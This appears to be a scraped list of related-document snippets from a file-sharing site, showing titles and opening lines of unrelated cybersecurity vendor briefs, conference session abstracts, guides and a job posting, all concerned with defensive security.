More informationSOLUTION BRIEF RSA NETWITNESS EVOLVED SIEM
RSA NETWITNESS EVOLVED SIEM OVERVIEW A SIEM is technology originally intended for compliance and log management. Later, as SIEMs became the aggregation points for security alerts, they began to be more
More informationRSA ECAT DETECT, ANALYZE, RESPOND!
RSA ECAT DETECT, ANALYZE, RESPOND! Cyber Threat Landscape Attack surface (& attackers) expanding Web app Existing strategies & controls are failing Laptop EHR Firewall Attacks sophistication on the rise
More informationThe Rise of the Purple Team
SESSION ID: AIR-W02 The Rise of the Purple Team Robert Wood Head of Security Nuna @robertwood50 William Bengtson Senior Security Program Manager Nuna @waggie2009 Typical Team Responsibilities Red Vulnerability
More informationCompare Security Analytics Solutions
Compare Security Analytics Solutions Learn how Cisco Stealthwatch compares with other security analytics products. This solution scales easily, giving you visibility across the entire network. Stealthwatch
More informationCIS Controls Measures and Metrics for Version 7
Level 1.1 Utilize an Active Discovery Tool 1.2 Use a Passive Asset Discovery Tool 1.3 Use DHCP Logging to Update Asset Inventory 1.4 Maintain Detailed Asset Inventory 1.5 Maintain Asset Inventory Information
More informationUn SOC avanzato per una efficace risposta al cybercrime
Un SOC avanzato per una efficace risposta al cybercrime Identificazione e conferma di un incidente @RSAEMEA #RSAEMEASummit @masiste75 Mauro Costantini - Presales Consultant Agenda A look into the threat
More information10x Increase Your Team s Effectiveness by Automating the Boring Stuff
SESSION ID: TTA-R02 10x Increase Your Team s Effectiveness by Automating the Boring Stuff Jonathan Trull Chief Cybersecurity Advisor Microsoft @jonathantrull Vidhi Agarwal Senior Program Manager Microsoft
More informationTHREAT INTEL AND CONTENT CURATION: ORGANIZING THE PATH TO SUCCESSFUL DETECTION
SESSION ID: AIR-W12 THREAT INTEL AND CONTENT CURATION: ORGANIZING THE PATH TO SUCCESSFUL DETECTION Justin Monti CTO MKACyber Mischel Kwon CEO MKACyber @MKACyber What is Cyber Threat Intelligence Data collected,
More informationDefining cybersecurity.
PREPARING FOR TOMORROW S THREATS 28 September 2016 Andrew Facchini Presales & Product Manager +47 459 07 330 andrew@mnemonic.no Defining cybersecurity. WHO IS MNEMONIC? Founded in 2000 110+ security specialists
More informationDATA SHEET RSA NETWITNESS ENDPOINT DETECT UNKNOWN THREATS. REDUCE DWELL TIME. ACCELERATE RESPONSE.
RSA NETWITNESS ENDPOINT DETECT UNKNOWN THREATS. REDUCE DWELL TIME. ACCELERATE RESPONSE. KEY CUSTOMER BENEFITS: Gain complete visibility into all endpoints, regardless of whether they are on or off the
More informationIBM Security Network Protection Solutions
Systems IBM Security IBM Security Network Protection Solutions Pre-emptive protection to keep you Ahead of the Threat Tanmay Shah Product Lead Network Protection Appliances IBM Security Systems 1 IBM Security
More informationFighting Phishing I: Get phish or die tryin.
Fighting Phishing I: Get phish or die tryin. Micah Nelson and Max Hyppolite bit.ly/nercomp_sap918 Please, don t forget to submit your feedback for today s session at the above URL. If you use social media
More information01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED
01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED Contents 1. Introduction 3 2. Security Testing Methodologies 3 2.1 Internet Footprint Assessment 4 2.2 Infrastructure Assessments
More informationFile Reputation Filtering and File Analysis
This chapter contains the following sections: Overview of, page 1 Configuring File Reputation and Analysis Features, page 5 File Reputation and File Analysis Reporting and Tracking, page 14 Taking Action
More informationAdvanced Threat Defense Certification Testing Report. Symantec Corporation Symantec Advanced Threat Protection
Advanced Threat Defense Certification Testing Report Symantec Advanced Threat Protection ICSA Labs Advanced Threat Defense December 8, 2015 Prepared by ICSA Labs 1000 Bent Creek Blvd., Suite 200 Mechanicsburg,
More informationWhat can we lose not implementing proper security in our IT environment? Aleksandar Pavlovic Security Account Manager Cisco
What can we lose not implementing proper security in our IT environment? Aleksandar Pavlovic Security Account Manager Cisco Increasing Digital Traffic Creates a Greater Attack Surface Global IP Traffic
More informationTrend Micro Incorporated reserves the right to make changes to this document and to the product described herein without notice. Before installing and using the product, review the readme files, release
More informationCyber Hygiene Guide. Politicians and Political Parties
Cyber Hygiene Guide Politicians and Political Parties Canadian Election Integrity Initiative Design by ccm.design Cover Image by Songquan Deng Helping to Safeguard the Integrity of the Electoral Process
More informationRSA Advanced Security Operations Richard Nichols, Director EMEA. Copyright 2015 EMC Corporation. All rights reserved. 1
RSA Advanced Security Operations Richard Nichols, Director EMEA 1 What is the problem we need to solve? 2 Attackers Are Outpacing Defenders..and the Gap is Widening Attacker Capabilities The defender-detection
More informationATTIVO NETWORKS THREATDEFEND PLATFORM INTEGRATION WITH CISCO SYSTEMS PROTECTS THE NETWORK
PARTNER BRIEF ATTIVO NETWORKS THREATDEFEND PLATFORM INTEGRATION WITH CISCO SYSTEMS PROTECTS THE NETWORK INTRODUCTION Attivo Networks has partnered with Cisco Systems to provide advanced real-time inside-the-network
More informationManaged Security Services - Endpoint Managed Security on Cloud
Services Description Managed Security Services - Endpoint Managed Security on Cloud The services described herein are governed by the terms and conditions of the agreement specified in the Order Document
More informationFTA 2017 SEATTLE. Cybersecurity and the State Tax Threat Environment. Copyright FireEye, Inc. All rights reserved.
FTA 2017 SEATTLE Cybersecurity and the State Tax Threat Environment 1 Agenda Cybersecurity Trends By the Numbers Attack Trends Defensive Trends State and Local Intelligence What Can You Do? 2 2016: Who
More informationSecurity Monitoring Engineer / (NY or NC) Director, Information Security. New York, NY or Winston-Salem, NC. Location:
Position: Reports to: Location: Security Monitoring Engineer / (NY or NC) Director, Information Security New York, NY or Winston-Salem, NC Position Summary: The Clearing House (TCH) Information Security
More informationTrend Micro Business Support Portal
Lorem Ipsum Dolor Sit Amet Consectetur Adipiscing Trend Micro Business Support Portal User Guide Welcome to the Trend Micro Business Support Portal. This portal provides full online support for Trend Micro
More informationYou Can t Stop What You Can t See
SESSION ID: EXP-RO4 You Can t Stop What You Can t See Learning from the experiences of others Jared Myers Principal Consultant RSA Incident Response RSA, The Security Division of EMC Grant Geyer Senior
More informationWHAT IS CORPORATE ACCOUNT TAKEOVER? HOW DOES IT HAPPEN?
WHAT IS CORPORATE ACCOUNT TAKEOVER? Corporate Account Takeover (also referred to as CATO) is a type of fraud where criminals gain access to a business financial accounts to make unauthorized transactions.
More information